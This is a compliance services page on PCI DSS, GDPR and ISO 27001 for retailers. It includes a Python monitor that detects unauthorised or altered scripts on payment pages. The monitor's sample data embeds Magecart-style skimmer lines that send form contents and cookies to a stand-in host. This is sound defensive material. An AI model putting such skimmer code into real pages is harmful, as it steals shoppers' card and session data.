Security and Compliance for Retail & E-commerce
Retail and e-commerce organisations face a convergence of compliance obligations: PCI DSS for payment card processing, GDPR for customer data, and ISO 27001 for enterprise supplier qualification and cyber insurance requirements. BALTUM provides integrated programmes that address all three efficiently — with particular expertise in e-commerce payment flows and retail supply chain security.
PCI DSS v4.0 for Retailers
Any retailer that stores, processes, or transmits cardholder data, or whose systems could affect the security of that data, must comply with PCI DSS. This includes e-commerce platforms using payment pages, point-of-sale systems, and card-not-present transaction processing. The current version of the standard is v4.0.1 (v4.0 itself was retired at the end of 2024). Its e-commerce requirements, 6.4.3 (an inventory of every script loaded on a payment page, each one authorised and integrity-checked) and 11.6.1 (a mechanism that detects unauthorised changes to the HTTP headers and content of payment pages as received by the browser), target client-side skimming (Magecart-style attacks) and became mandatory on 31 March 2025. Outsourcing card capture to a provider's hosted page or iframe reduces scope but does not remove it: the merchant's own page that embeds the iframe is exactly what a skimmer tampers with, so it still has to be protected against script injection.
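The core of a 6.4.3 / 11.6.1 control is simple to state: keep an authorised inventory of the scripts a payment page is allowed to carry, with an expected hash for each, and periodically compare what the page actually serves against it. The script below is an added illustration of that comparison, written for this page; it is not BALTUM's tooling and not part of any PCI SSC material. The page HTML, script bodies and URLs (shop.example, cdn.stats-example.net) are constructed for the example; a real monitor would fetch the live page and each script from the network rather than from inline strings.

```python
import base64
import hashlib
from html.parser import HTMLParser


def sri_hash(body: bytes) -> str:
    """SHA-384 digest in the format an SRI integrity attribute carries."""
    return "sha384-" + base64.b64encode(hashlib.sha384(body).digest()).decode("ascii")


class ScriptCollector(HTMLParser):
    """Collect every <script> element on a page: src, integrity attribute and inline body."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            a = dict(attrs)
            self._current = {"src": a.get("src"), "integrity": a.get("integrity"), "body": ""}

    def handle_data(self, data):
        if self._current is not None:  # script content arrives here as CDATA
            self._current["body"] += data

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._current is not None:
            self.scripts.append(self._current)
            self._current = None


def check_payment_page(html, fetched_bodies, inventory, inline_allowed):
    """Compare the scripts on a payment page against the authorised inventory.

    inventory:      src -> expected SRI hash of that script's body (6.4.3 inventory)
    inline_allowed: set of SRI hashes of authorised inline scripts
    fetched_bodies: src -> bytes the monitor retrieved from that URL
    Returns a list of (finding, detail) tuples; an empty list means no drift.
    """
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for s in collector.scripts:
        if s["src"] is None:
            if sri_hash(s["body"].strip().encode()) not in inline_allowed:
                findings.append(("unauthorised-inline", s["body"].strip()[:60]))
            continue
        src = s["src"]
        expected = inventory.get(src)
        if expected is None:  # a script nobody authorised: the classic injected skimmer
            findings.append(("unauthorised-script", src))
            continue
        if s["integrity"] is None:  # authorised, but the page no longer pins it
            findings.append(("missing-integrity", src))
        elif s["integrity"] != expected:
            findings.append(("integrity-mismatch", src))
        body = fetched_bodies.get(src)
        if body is None:
            findings.append(("unretrievable", src))
        elif sri_hash(body) != expected:  # served content drifted from the inventory
            findings.append(("content-changed", src))
    return findings


# ---- constructed sample data (hypothetical shop, not a real site) ----
CHECKOUT_URL = "https://shop.example/static/checkout.js"
CHECKOUT_JS = b"document.getElementById('pay').addEventListener('submit', submitOrder);"
INLINE_OK = "window.__checkoutConfig = {currency: 'GBP'};"

INVENTORY = {CHECKOUT_URL: sri_hash(CHECKOUT_JS)}
INLINE_ALLOWED = {sri_hash(INLINE_OK.encode())}


def build_page(inline_js, extra_html=""):
    return f"""<html><body>
<form id="pay">...</form>
<script src="{CHECKOUT_URL}" integrity="{INVENTORY[CHECKOUT_URL]}" crossorigin="anonymous"></script>
<script>{inline_js}</script>
{extra_html}
</body></html>"""


CLEAN_PAGE = build_page(INLINE_OK)
CLEAN_FETCHED = {CHECKOUT_URL: CHECKOUT_JS}

# Magecart-style drift: checkout.js modified on the origin, the inline config rewritten
# to post form contents to a third party, and an unlisted script tag injected.
SKIMMER_URL = "https://cdn.stats-example.net/s.js"
TAMPERED_PAGE = build_page(
    INLINE_OK + " fetch('" + SKIMMER_URL + "', {method:'POST', body: document.forms.pay.innerText});",
    f'<script src="{SKIMMER_URL}"></script>',
)
TAMPERED_FETCHED = {
    CHECKOUT_URL: CHECKOUT_JS + b"\nnew Image().src='https://cdn.stats-example.net/c?d='+btoa(document.cookie);"
}

if __name__ == "__main__":
    print("clean:", check_payment_page(CLEAN_PAGE, CLEAN_FETCHED, INVENTORY, INLINE_ALLOWED))
    print("tampered:", check_payment_page(TAMPERED_PAGE, TAMPERED_FETCHED, INVENTORY, INLINE_ALLOWED))
```

Two design points matter in practice. First, the check compares the served script body against the inventory independently of the integrity attribute on the page, because an attacker who can edit the page can also update (or drop) the integrity attribute; the browser-side SRI check and the server-side inventory check cover different failure modes. Second, the comparison is only as good as the vantage point: fetch the page as a customer's browser would, from outside the origin, because skimmers are routinely served conditionally by User-Agent, geography or referrer.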
GDPR for E-commerce
E-commerce operations collect extensive personal data: purchase histories, browsing behaviour, customer profiles, loyalty programme data, and payment details (which are also cardholder data under PCI DSS, so the two regimes overlap on the same records). GDPR imposes strict requirements on lawful basis and consent, data minimisation and retention, profiling and automated decision-making, and cross-border transfers, with fines of up to EUR 20 million or 4% of global annual turnover, whichever is higher. ISO/IEC 27701, the privacy information management extension to ISO 27001, provides the documented framework that supports GDPR's accountability principle (Article 5(2)); it is not itself a GDPR certification under Article 42, but partners and auditors widely accept it as evidence that privacy controls are implemented and operated.
Cyber Insurance and ISO 27001
Cyber insurance underwriters increasingly ask for ISO 27001 certification or equivalent documented controls when assessing a risk, and holding it typically improves terms and premiums. The hard preconditions for coverage are more often specific controls: multi-factor authentication on remote access and email, endpoint detection and response, and tested offline backups, all of which an ISO 27001 programme should produce evidence for. ISO 27001 does not, however, satisfy payment network (card brand) requirements: a high-volume (Level 1) merchant still needs an annual PCI DSS assessment by a Qualified Security Assessor resulting in a Report on Compliance, and lower-level merchants still need the applicable Self-Assessment Questionnaire. What an ISO 27001 ISMS does provide is a control set that maps onto much of PCI DSS and GDPR, so evidence gathered once (access reviews, change records, vulnerability management, incident response exercises) can serve all three assessments.